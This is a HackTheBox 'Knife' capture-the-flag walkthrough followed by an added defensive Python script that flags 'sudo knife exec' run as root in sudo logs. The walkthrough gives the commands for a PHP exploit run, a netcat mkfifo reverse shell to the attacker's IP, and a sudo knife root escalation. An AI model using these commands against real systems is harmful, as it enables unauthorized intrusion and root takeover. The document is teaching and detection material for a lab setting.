HackTheBox : Knife Walkthrough

Step 1:
Let’s scan for open ports with Nmap
Command: nmap -A 10.10.10.242

Step 2:
I couldn’t find anything definitive from the port scan, so let’s look at the network traffic with Burp Suite.

Here we see the version of PHP. Now let’s find the appropriate exploit for this version.

Let’s look at the first one.

Now, let’s download this exploit and start the infiltration process.
Step 3:
Command: python3 49933.py

Good, we’re inside now.
Let’s look at who we are and all the files.
Command: whoami
Command: find

Let’s look inside this file.
Command: cat ./home/james/user.txt

Find the user flag and submit it to HTB.
Get root
Let’s set up a connection between the target machine and our own machine.
Command: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f
Create an interactive terminal with python
Command: python3 -c 'import pty;pty.spawn("/bin/bash")'
Get root and find the flag
Command: sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'"

Find the root flag and submit it to HTB.
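From the defender's side, the `sudo /usr/bin/knife exec` step leaves an entry in sudo's log. The following is an added example, not part of the original walkthrough, that parses sudo log lines and flags `knife exec` run as root; the sample lines, the host name and the assumption that the user james invoked sudo are constructed for illustration.

```python
import re
import shlex

# sudo's syslog record: "<user> : TTY=... ; PWD=... ; USER=<runas> ; COMMAND=<cmd>"
SUDO_RE = re.compile(
    r"sudo(?:\[\d+\])?:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.+)$"
)

def parse_sudo_line(line):
    """Return user, runas and cmd for a sudo log line, or None if it is not one."""
    m = SUDO_RE.search(line.rstrip("\n"))
    return m.groupdict() if m else None

def is_knife_code_exec(cmd):
    """True when the command is the `knife exec` subcommand, which runs Ruby code."""
    try:
        argv = shlex.split(cmd)
    except ValueError:              # unbalanced quotes in the logged command
        argv = cmd.split()
    if not argv or argv[0].rsplit("/", 1)[-1] != "knife":
        return False
    # The subcommand is the first argument that is not an option.
    sub = next((a for a in argv[1:] if not a.startswith("-")), None)
    return sub == "exec"

def detect(lines):
    """Return (line number, invoking user, command) for each knife exec run as root."""
    alerts = []
    for n, line in enumerate(lines, 1):
        ev = parse_sudo_line(line)
        if ev and ev["runas"] == "root" and is_knife_code_exec(ev["cmd"]):
            alerts.append((n, ev["user"], ev["cmd"]))
    return alerts

# Constructed sample log lines (not taken from the target machine).
SAMPLE = [
    "Jun  1 10:02:11 knife sudo:    james : TTY=pts/0 ; PWD=/home/james ; USER=root ; COMMAND=/usr/bin/knife node list",
    "Jun  1 10:03:40 knife sudo:    james : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/knife exec --exec exec '/bin/sh -i'",
    "Jun  1 10:04:02 knife sudo:    james : TTY=pts/0 ; PWD=/ ; USER=root ; COMMAND=/usr/bin/apt update",
]

if __name__ == "__main__":
    for n, user, cmd in detect(SAMPLE):
        print(f"line {n}: {user} ran as root: {cmd}")
```

The same finding points at the fix: a sudoers rule that grants `/usr/bin/knife` without restricting its arguments is equivalent to granting a root shell.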